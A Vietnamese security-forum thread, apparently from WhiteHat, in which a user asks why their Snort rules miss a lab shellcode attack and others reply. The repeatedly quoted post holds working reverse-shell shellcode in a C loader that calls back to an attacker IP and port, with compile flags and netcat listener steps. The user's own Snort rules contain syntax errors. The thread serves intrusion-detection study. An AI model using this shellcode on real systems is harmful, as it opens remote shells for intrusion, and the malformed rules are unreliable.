Write rule snort error

nguyenblack

Active Member
03/10/2017
4
36 bài viết
Write rule snort error
upload_2017-10-23_8-6-12.png

Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1;)

alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1;)
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ

mình sử dụng shellcode:
#include <stdio.h>
#include <string.h>

char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <— địa chỉ IP máy attacker
"\x66\x68"
"\x82\x35" // <— port 33333
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc,char **argv) {
int(*func)();
func=(int(*)())code;
(int)(*func)();
}
ví dụ mình lưu tên file là shellcode.c
chạy lệnh : gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
cả máy victim và attacker đều sử dụng kali linux hết.
khi chạy lệnh trên thì ta được 1 file shellcode. Copy file này để bên victim.
bên attack chạy lệnh : nc -lvp 33333 ( lắng nghe port 33333)
bên máy victim chạy : ./shellcode ( chạy file shellcode vừa tạo )
khi chạy xong thì máy attacker mở kết nối tới victim.
Anh/em nào cho mình biết rule snort để phát hiện cuộc tấn công shellcode này với nhé. Mình mò hơn 2 tuần rồi. Cảm ơn mọi người
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: sunny
View attachment 2472
Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1;)

alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1;)
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ

mình sử dụng shellcode:
#include <stdio.h>
#include <string.h>

char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <— địa chỉ IP máy attacker
"\x66\x68"
"\x82\x35" // <— port 33333
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc,char **argv) {
int(*func)();
func=(int(*)())code;
(int)(*func)();
}
ví dụ mình lưu tên file là shellcode.c
chạy lệnh : gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
cả máy victim và attacker đều sử dụng kali linux hết.
khi chạy lệnh trên thì ta được 1 file shellcode. Copy file này để bên victim.
bên attack chạy lệnh : nc -lvp 33333 ( lắng nghe port 33333)
bên máy victim chạy : ./shellcode ( chạy file shellcode vừa tạo )
khi chạy xong thì máy attacker mở kết nối tới victim.
Anh/em nào cho mình biết rule snort để phát hiện cuộc tấn công shellcode này với nhé. Mình mò hơn 2 tuần rồi. Cảm ơn mọi người
Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
View attachment 2472
Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1;)

alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1;)
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ
Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw
Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw
Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw
hic :( ~ mình dùng rồi nhưng ko đc
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn đã dùng như thế nào ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
thì mình lấy rule ở link đó . xong bật cho nó chạy nhưng khi mình thực hiện tấn công thì nó ko cảnh báo gì cả
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
thì mình lấy rule ở link đó . xong bật cho nó chạy nhưng khi mình thực hiện tấn công thì nó ko cảnh báo gì cả
Bạn lấy rule mà bạn không thay shellcode vào thì đâu biết nó có chắc chắn detect được hay ko. @@
Ví dụ:
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE sparc setuid 0"; content:"|82 10| |17 91 D0| |08|"; reference:arachnids,282; classtype:system-call-detect; sid:647; rev:6;)

phần content bạn nên xem thử đoạn payload của bạn phần nào quan trọng thì thay thế vào phần content. Bạn nên xem kỹ lại cái payload charcode, payload đó bạn copy trên mạng. phần IP với port bạn cũng để nguyên, xem thử lại bạn đã chạy đúng cách chưa nữa nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên